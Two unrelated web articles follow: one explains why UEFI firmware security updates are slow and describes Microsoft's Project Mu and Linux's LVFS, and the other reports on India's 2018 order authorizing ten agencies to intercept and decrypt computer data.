However, UEFI is a little more complicated than the older BIOS software. For example, computers with Intel processors have something called the Intel Management Engine , which is basically a tiny operating system. It runs in parallel to windows, linux, or whatever operating system you’re running on your computer. On corporate networks, system administrators can use features in the Intel ME to remotely manage their computers.

UEFI also contains processor “microcode,” which is kind of like firmware for your processor. When your computer boots, it loads microcode from the UEFI firmware. Think of it like an interpreter that translates software instructions to hardware instructions performed on the CPU.

RELATED: What Is UEFI, and How Is It Different from BIOS?

The last few years have shown over and over why UEFI firmware needs timely security updates.

We all learned aboutSpectre in 2018, showing the serious architectural problems with modern CPUs. Problems with something called “speculative execution” meant programs could escape standard security restrictions and read secure areas of memory. Fixes to Spectre required CPU microcode updates to function correctly. That means PC manufacturers had to update all their laptop and desktop PCs―and motherboard manufacturers had to update all their motherboards―with new UEFI firmware containing the updated microcode. Your PC isn’t adequately protected against Spectre unless you’ve installed a UEFI firmware update. AMD also released microcode updates to protect systems with AMD processors from Spectre attacks, so this isn’t just an Intel thing.

Intel’s Management Engine has seen some security bugs that could either let attackers with local access to the computer crack the Management Engine software, or let an attacker with remote access cause trouble. Luckily, the remote exploits only affected businesses who had enabled Intel Active Management Technology (AMT), so average consumers weren’t affected.

These are just a few examples. Researchers have also demonstrated shown it’s possible to abuse the UEFI firmware on some PCs, using it to gain deep access to the system. They’ve even demonstrated persistent ransomware that gained access to a computer’s UEFI firmware and ran from there.

The industry should be updating every computer’s UEFI firmware just like any other software to help protect against these problems and similar flaws in the future.

RELATED: How to Check if Your PC or Phone Is Protected Against Meltdown and Spectre

The BIOS update process has been a mess forever―since long before UEFI. Traditionally, computers shipped with that old-school BIOS, and less could go wrong. PC manufacturers might ship a fewBIOS updates to fix minor problems, but the usual advice was to avoid installing them if your PC was working properly. You often had to boot from a bootable DOS drive to flash the BIOS update, and everyone heard stories of BIOS updates failing and bricking PCs, rendering them unbootable.

Things have changed. UEFI firmware does a lot more, and Intel has released several big updates to things like CPU microcode and the Intel ME in the past few years. Whenever Intel releases such an update, all Intel can do is say “ask your computer manufacturer.” Your computer manufacturer―or motherboard manufacturer, if you built your own PC―has to take the code from Intel and integrate it into a new UEFI firmware version. They then have to test the firmware. Oh, and each manufacturer has to repeat this process for every individual PC they sell, as they all have different UEFI firmware. It’s the kind of manual work that madeAndroid phones so difficult to update in the past.

In practice, this means it often takes a long time―many months―to get critical security updates that have to be delivered via UEFI. It means manufacturers might shrug and refuse to update PCs that are just a few years old. And, even when manufacturers do release updates, those updates are often buried on that manufacturer’s support website. Most PC users won’t ever discover those UEFI firmware updates exist and install them, so these bugs end up living on in existing PCs for a long time. And some manufacturers still make you install firmware updates bybooting into DOS first―just to make it extra complicated.

That’s a mess. We need a streamlined process where manufacturers can more easily create new UEFI firmware updates. We also need a better process for releasing those updates, so users can get them automatically installed on their PCs. Right now the process is slow and manual―it should be fast and automatic.

That’s what Microsoft is trying to do with Project Mu. Here’s how the official documentation explains it:

Project Mu is all about helping PC manufacturers create and test UEFI updates faster by streamlining the UEFI development process and helping everyone work together. Hopefully, this is the missing piece, as Microsoft has already made it easier for PC manufacturers to send their UEFI firmware updates to users automatically.

Specifically, Microsoft lets PC manufacturers issue firmware updates through Windows Update and has provided documentation on this since at least 2017.Microsoft also announced Component Firmware Update ; an open-source model that manufacturers can use to update UEFI and other firmware, back in October 2018. If PC manufacturers get on board with this, they could deliver firmware updates to all their users very quickly.

This isn’t just a Windows thing, either. Over on Linux, developers are trying to make it easier for PC manufacturers to issue UEFI updates with LVFS , the Linux Vendor Firmware Service. PC vendors can submit their updates, and they’ll appear for download in the GNOME Software application, which is used on Ubuntu and many other Linux distributions. This effort dates back to 2015. PC manufacturers like Dell and Lenovo are participating.

These solutions for Windows and Linux affect more than just UEFI updates, too. Hardware manufacturers could use them to update everything from USB mouse firmware to solid-state drive firmware in the future.

As SwiftOnSecurity put it when talking about the problems with solid-state drive firmwareand encryption , firmware updates can be reliable. We need to expect better from hardware manufacturers.

Firmware updates can be reliable. I have initiated at least 3,000 Dell BIOS updates with only one failure, and that old PC was already in service for failing.

Re-think what you think is impossible. Firmware servicing is not impossible or risky. It requires people demand better.

― SwiftOnSecurity (@SwiftOnSecurity) November 6, 2018

The Indian government has authorized10 central agencies to intercept, monitor, and decrypt data on any computer, sending a shock wave through citizens and privacy watchdogs.

Narendra Modi’s government late Thursday broadened the scope of Section 69 of the nation’s IT Act, 2000 to require a subscriber, service provider, or any person in charge of a computer to “extend all facilities and technical assistance to the agencies.” Failure to comply with the agencies could result in seven years of imprisonment and an unspecified fine.

In a clarification posted today, the Ministry of Home Affairs said each case of interception, monitoring, and decryption is to be approved by the competent authority, which is the Union Home Secretary.

The agencies that have been authorized with this new power are the Intelligence Bureau, Narcotics Control Bureau, Enforcement Directorate, Central Board of Direct Taxes, Directorate of Revenue Intelligence, Central Bureau of Investigation, National Investigation Agency, Research and Analysis Wing, Directorate of Signal Intelligence (in service areas of J-K, North East and Assam), and Delhi Police.

Explaining the rationale behind the order, India’s IT minister, Ravi Shankar Prasad said that the measure was undertakenin the interests of national security. He added that some form of “tapping” has already been going on in the country for a number of years and that the new order would help bring structure to that process. “Always remember one thing,” he said in a televised interview. “Even in the case of a particular individual, the interception order shall not be effective unless affirmed by the Home Secretary.”

“To us this order is unconstitutional and in breach of the telephone tapping guidelines, the Privacy Judgement and the Aadhaar Judgement,” it asserted, adding that it was working with volunteers and lawyers to further scrutinize the order.

This is overbroad, has a chilling effect and is liable to be struck down in toto: still amazing how many government actions on online regulation have been straight up, ex-facie unconstitutional. https://t.co/nOhI8vA2Tx

― Karuna Nundy (@karunanundy) December 21, 2018

IT minister Prasad lashed out at the opposition, asking whether they believe the government should not do anything to halt the proliferation of terrorist activities, which he alleged are being conducted on the internet.

VentureBeat has reached out to Apple, Google, Facebook, and Amazon to hear their comment. Microsoft declined to comment.

The move by the Indian government comes days after the Australian government, in a global first, took a stricter approach to the way communications service are handled within its borders. Earlier this month, the Australian parliament passed laws giving police and security agencies in the nation the power to access messages on encrypted platforms. The government said it is taking this step in an attempt to combat terrorism and other crime.